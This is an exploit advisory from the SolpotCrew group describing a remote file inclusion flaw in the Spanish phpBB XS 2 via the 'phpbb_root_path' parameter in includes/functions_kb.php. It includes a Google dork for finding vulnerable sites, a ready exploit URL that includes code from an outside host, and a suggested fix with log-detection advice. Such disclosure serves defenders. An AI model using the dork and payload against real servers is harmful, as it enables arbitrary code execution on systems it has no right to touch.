#############################SolpotCrew Community################################
#
# phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion
#
# Download : http://www.elanzuelo.es/phpbb.tar.gz
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt
#
################################################################################
#
#
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
# [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta
# and all member solpotcrew community @ http://nyubicrew.org/forum/
# especially thx to str0ke @ milw0rm.com
#
###############################################################################

Input passed to the "phpbb_root_path" parameter is not properly verified before being used to include files.
This can be exploited to execute arbitrary PHP code by including files from local or external resources.
The include_once() quoted below sits at file scope, and the excerpt shows no assignment to $phpbb_root_path before it, so a direct request to includes/functions_kb.php can set the variable only when PHP's register_globals is on.
Including from an external resource additionally requires allow_url_fopen (and, from PHP 5.2, allow_url_include).

Code from includes/functions_kb.php:

/***************************************************************************
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
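 *
 *
 ***************************************************************************/

//
// get_quick_stats();
// gets number of articles
//
include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);
function get_quick_stats()

Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://injek-pala-lappet?

Fix : includes/functions_kb.php should refuse direct requests before the include_once() is reached, the way phpBB 2 scripts do with if ( !defined('IN_PHPBB') ) { die('Hacking attempt'); }, so that $phpbb_root_path is only ever set by the including page. Turning off register_globals and allow_url_fopen removes the preconditions on the PHP side. Requests for includes/functions_kb.php that carry a phpbb_root_path parameter are the thing to look for in web server logs.

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################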